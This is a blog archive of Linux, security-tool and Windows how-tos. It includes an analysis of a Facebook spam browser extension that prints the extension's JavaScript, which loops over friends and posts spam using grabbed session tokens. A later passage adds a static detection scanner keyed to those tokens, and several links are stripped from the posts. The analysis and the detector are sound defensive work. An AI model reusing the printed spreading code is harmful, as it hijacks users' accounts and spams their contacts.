Wednesday, August 14, 2013

How to install Alfa Network card on Matriux Krypton and later

This is just an experimental solution and has been worked around with other Linux groups.

Extract the drivers for kernel 3.0+

edit the following files:

and search for the #include for smp_lock.h (one in each file). Comment out or delete the line and save the files.


void daemonize(char *, char *);
just before these lines:

inline static void thread_enter(void *context)
    //struct net_device *pnetdev = (struct net_device *)context;
    //daemonize("%s", pnetdev->name);
    daemonize("%s", "RTKTHREAD");

Friday, May 18, 2012

Compile Debian Kernel (Squeeze) 3.0 and Above with Aufs and squashfs

This tutorial is intended for anyone who is facing problems patching the aufs modules using the old methods (2.6.x).

Prerequisites:

Debian (I believe the same process holds for Ubuntu)
And, again, the ABCs of Linux


Open up a terminal

Make a directory "linux":

mkdir /root/linux

Install all the packages required to build the kernel

aptitude update && aptitude install dkms kernel-package libncurses5-dev wget bzip2 fakeroot build-essential

Download the latest sources from (3.3.6 was the latest when this post was written) by typing the following in a terminal

Step 4:

Extract the sources to the folder we made earlier

tar xjvf linux-3.3.6.tar.bz2 -C /root/linux --strip-components=1

Step 5:

Download the aufs modules and create a patch

mkdir /tmp/aufs
cd /tmp/aufs
git clone git:// aufs3-standalone.git
cd aufs3-standalone.git
git checkout origin/aufs3.3
mkdir ../a ../b
cp -r Documentation ../b
cp -r fs ../b
cp -r include ../b
rm ../b/include/linux/Kbuild
cd ..
diff -rupN a/ b/ > /root/linux/aufs.patch
cat aufs3-standalone.git/*.patch >> /root/linux/aufs.patch 

Step 6:

Apply the patch

cd /root/linux
patch -p1 < aufs.patch

Step 7:

Now start the build process

make clean && make mrproper

Step 8 i: (if you want to have the same config as your existing kernel)

Configuring the kernel:

If you wish to have the same config as your existing kernel, follow these steps

cp /boot/config-`uname -r` ./.config

This will load the existing kernel config file.

Now type

make menuconfig

Step 8 ii: (if you want to have a custom config of your own)

Configuring the kernel:

Copy your custom-made .config to the current directory

and type

make menuconfig

Step 9:

You will now be shown a screen

Go to Load an Alternate Configuration File and choose .config (this is the .config file we copied to our directory in step 8) and press OK.

Step 10:

Now we will make our own custom kernel

make-kpkg clean
fakeroot make-kpkg --initrd --stem extraversion --revision revision --append-to-version=-customversion kernel_image kernel_headers

You need to supply your own values for these 3 items in the above command:
extraversion - give your own extraversion for the kernel
revision - the revision you want the kernel to be
customversion - the custom revision of the kernel

Then sit back for a couple of hours, since it takes time.

After successful compilation of the kernel you will see two .deb packages in the ../ folder:
1. Kernel image file .deb
2. Kernel header file .deb

Step 11:

Install them by typing the following commands

dpkg -i linux-image-*
dpkg -i linux-headers-*
(You may type the whole file name, as in dpkg -i linux-image-3.3.6-custom_3.3.6-custom-1.00.custom_i386.deb, depending on whatever is generated in your case.)

Restart your system and you should see your kernel in the GRUB menu, or else verify the kernel version with

uname -a

Congrats, you have successfully compiled the Linux kernel for Debian and its derivatives :))

Note: If you face any issues, comment on this post and I will reply to you.

Monday, March 12, 2012

Ostinato - Wireshark in Reverse

This is a brief introduction to Ostinato, an open-source network packet crafter/traffic generator and analyzer with a very easy-to-use GUI. Like it says, it aims to be the reverse of Wireshark.

What can be done with Ostinato?

Generate, craft and analyze traffic
Specify your own hex dump
Create and configure multiple packet streams with stream rates, bursts and packets over multiple ports and computers using a single client
Capture and view the packets alongside Wireshark

Let's get started! Ostinato can be found in the Matriux Arsenal as Arsenal => Scanning => Ostinato. This starts up a GUI which is very quick and easy to use (Figure 2).

Figure 2

Move around the port groups (either expand the list or create a new port group from the File menu). Right-click in the column on the right side and create a new stream as shown in the figure below (Figure 3).

Figure 3

Click on the tools option and configure the packets to be generated. Go ahead and choose all the options you prefer (protocols, data stream, source, destination).

Figure 4

Click OK and also the Apply button in the top right corner of the window, otherwise these settings will not take effect (Figure 5).

Figure 5

Now we are ready to generate the packet traffic. Click on the port you just applied and click the start button. This will start transmitting the traffic. You can capture the traffic that is being transmitted by selecting the configured port group and clicking on the capture button (Figure 6).

Figure 6

This traffic can be analyzed in Wireshark by clicking the view captured files button there (Figure 7).

Figure 7

So I hope you go ahead and try all the options in the Ostinato tool and play around with it.

This article was published in CHmag as a part of Matriux Vibhag

Tuesday, December 13, 2011

Analysis of a Facebook spam exploited through browser add-ons

This whitepaper is an analysis of Facebook spam exploited through browser add-ons and extensions, which can be found as a PDF for download at

Though spam on Facebook is not new to us, I find this particular spam leveraged very smartly, and it was a very interesting analysis for me because I was surprised to see to what extent the spammers can go. Today one of my friends on Facebook was very annoyed with this spam, which was posting on all his friends' walls and looked like this:

I was asked what to do. Looking at it, it surely looked just like every other spam, so I suggested all the usual measures, like removing all his doubtful Facebook applications and clearing his browser data. But it continued even after that, so I decided to look into it.
First the URL: the spam seems to have originated from http://, and looking at the blog, it looked like this:

Interesting! It needs a DivX plug-in, yet asks to install a YouTube Premium plugin (wonder what a “premium” for YouTube would be!!).

So I decided to look into the page source; here is what it contained:

So this would install the browser add-on/extension based on the browser. The else part of the code made sense to me, as it has to go further if the browser is not Firefox or Chrome; let’s look into the PHP of the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; youtube.js was the one to look into:

Navigating to it, I found

Another script at finally this was the final script ;)
Now let’s analyze this script.
Remember the else part in the first code snippet, which I promised to discuss later? It contained a link. The file extra.js also contains this part, to redirect the user to this URL after the installation of the add-on/extension. Navigating to that link, I found

This page actually contained that video embedded; finally the person must be happy to see this video (however, the comments at the bottom are not real, it’s an image; stupid and smart) ;)

As the person views the video and finishes it, this script stealing the browser cookies gets enough time to spread the spam on all the friends’ walls.

Further analyzing the code,

The code here assigns some random variables for the post so that it won’t be similar on all the walls. All the variables from post_form_id to var p3 are used to make a large number of combinations (use of mathematical combinations, smart eh?).

Looking into the main part of the code, where the message is generated and sent for posting:

for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = '';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = '';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};

Looking further into the above snippet of code, it is clear that it uses the grabbed cookies to post the spam on others' walls. This script also contained an unfinished part that was left out (maybe the spammer was happy with this for now, or wanted to grab some time from the user to finish the spam effectively) with a link to  which looked like,

However, looking into the source, it didn’t contain any script; rather, it was a static page whose content was actually an image file.
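The traits visible in the snippet above (string-indexed property access, the fb_dtsg and post_form_id form values, and an XMLHttpRequest POST built per friend uid inside a loop) can be checked statically when reviewing an extracted add-on. The following is an added example, not code from the original analysis; scanExtensionScript, the rule names and the thresholds are assumptions, and both samples are constructed.

```javascript
// Added example: static heuristics for reviewing an extracted add-on script.
// Rule names, thresholds and scanExtensionScript are hypothetical.

// Token and target parameter names taken from the snippet shown in this post.
const TOKEN_NAMES = ['fb_dtsg', 'post_form_id'];
const TARGET_PARAM = 'xhpc_targetid';

// String-indexed member access such as g['open'] or Math['random'].
const BRACKET_ACCESS = /\[\s*(['"])[A-Za-z_$][\w$]*\1\s*\]/g;

function scanExtensionScript(source) {
  const findings = [];
  const bracketHits = (source.match(BRACKET_ACCESS) || []).length;
  const dotHits = (source.match(/\.[A-Za-z_$][\w$]*/g) || []).length;
  // Hand-written code rarely prefers obj['name'] over obj.name throughout.
  if (bracketHits >= 5 && bracketHits > dotHits) {
    findings.push({ rule: 'bracket-obfuscation', detail: `${bracketHits} string-indexed accesses` });
  }
  const tokens = TOKEN_NAMES.filter((t) => source.includes(t));
  if (tokens.length > 0) {
    findings.push({ rule: 'facebook-form-tokens', detail: tokens.join(', ') });
  }
  // A POST issued through XMLHttpRequest, in dot or bracket notation.
  const makesXhr = /new\s+XMLHttpRequest\s*\(/.test(source);
  const posts = /(\.open|\[\s*['"]open['"]\s*\])\s*\(\s*['"]POST['"]/i.test(source);
  if (makesXhr && posts) findings.push({ rule: 'xhr-post', detail: 'XMLHttpRequest POST' });
  // A per-friend target parameter built inside a loop is the spreading step.
  if (source.includes(TARGET_PARAM) && /\bfor\s*\(/.test(source)) {
    findings.push({ rule: 'wall-post-loop', detail: `${TARGET_PARAM} built inside a loop` });
  }
  const verdict = findings.length >= 3 ? 'suspicious' : findings.length > 0 ? 'review' : 'clean';
  return { verdict, findings };
}

// Constructed sample: shortened, inert excerpt in the style of the snippet above.
const SAMPLE_SPAM = [
  "for (var f = 0; f < b; f++) {",
  "  var g = new XMLHttpRequest();",
  "  e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +",
  "      '&xhpc_targetid=' + a['payload']['entries'][f]['uid'];",
  "  g['open']('POST', d, true);",
  "  g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');",
  "}",
].join('\n');

// Constructed sample: an ordinary script with no matching traits.
const SAMPLE_BENIGN = 'document.title = document.title.trim();';

console.log(scanExtensionScript(SAMPLE_SPAM).verdict, scanExtensionScript(SAMPLE_BENIGN).verdict);
```

The heuristics only rank files for manual review; a legitimate script can trip a single rule, which is why one or two findings yield "review" rather than "suspicious".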

Though social networking sites often fall prey to such scams/spams, much of it happens with the users' consent, due to their ignorance. Most of the time, looking at a post is enough to tell whether it is a genuine video from a valid link. In this case:

1. Looking at the post, the link from where the post originated is clearly (underlined black)
2. Further, the thumbnail preview for videos has been changed: the play button is now transparent black, while the one in the spam we discussed had a blue play button (underlined red)
3. Always install extensions from known sources
   a. Chrome – from the Chrome store
   b. Firefox – Mozilla add-ons
4. Use add-ons like NoScript, No-Ads to avoid such scripts.
5. Stay away from scams/spams that promise to provide some gift or money.

Saturday, October 29, 2011

Setting Up Android SDK in Eclipse on Windows

This tutorial contains a step-by-step procedure to set up the Android SDK on a Windows machine.

Please read the prerequisites and installation requirements of each piece of software before proceeding.

Download the Android SDK from and install it.

You can install either of the two types available, .zip or .exe. As the site says, it is preferable to download the .exe, which is easier.

After you install the Android SDK, download the latest Eclipse

Either of the following two is good for basic Android development

Unzip Eclipse (I assume that you can set up the Eclipse path, etc.)

Start Eclipse and install the Android Development Tools (ADT) via

Help >> Install new software.

and add the link  and name it ADT

Select Developer Tools and click Next. If you get an error in the next step, like org.eclipse.wst.sse.core 0.0.0,

do the following; otherwise skip to the next step

1. Go to Help->Install New Software
2. Click on "Available Software Sites"
3. Set "check" on check box - (for helios - Eclipse 3.7)

Then try installing the ADT again

Just accept the license terms and finish the installation of ADT. It may show a few warnings regarding plugin verification; accept them and restart Eclipse after installation

After the restart you will see a popup like this

Select the path where the Android SDK was installed (or you can install a new SDK if you haven't done that before), finish the installation, and you should see the highlighted items in the Eclipse toolbar

That means you have successfully set up the Android SDK in Eclipse

Now click on the Android SDK Manager, select the Android platforms you want for your development, and install them as shown below

That is it !!!

Go ahead developing your android applications!

Thursday, September 29, 2011

Fix Windows Error While Installing : Cannot open registry key

Recently I was trying to install Windows Office 2010 by performing an upgrade over the existing Office 2007. It took too long, so I decided to stop the installation, manually uninstall 2007 and then go for a fresh installation of 2010. However, when I tried to uninstall 2007 there was some issue and I was not able to remove it.

I tried manually deleting the Office 2007 files and also removing all its temp and reference files on the disk. This worked fine, but when I tried to install 2010 I got the following error:

setup cannot open the registry key Unknown/Component/xxxxxxxxxxxx make sure you have administrative rights..

That was annoying, as I realized that the registry rights were screwed up. A little Google searching told me that I had to get SubInACL. However, that meant I had to fix all the registries.
So I found a cool script on Addictive Tips by Ghaus Iftikar Nakodari. Here is what you do:

Copy the SubInACL.exe from the place it installed to C:\Windows\system32

Now write the following in Notepad and save it as registryfix.cmd

subinacl /subkeyreg HKEY_LOCAL_MACHINE /setowner=administrators
subinacl /subkeyreg HKEY_CURRENT_USER /setowner=administrators
subinacl /subkeyreg HKEY_CLASSES_ROOT /setowner=administrators
subinacl /subkeyreg HKEY_LOCAL_MACHINE /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CURRENT_USER /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CLASSES_ROOT /grant=administrators=f /grant=system=f

Right-click on the file and run it as administrator. It should take a while before it fixes all the registry keys. Do not close or interrupt the process while it runs.
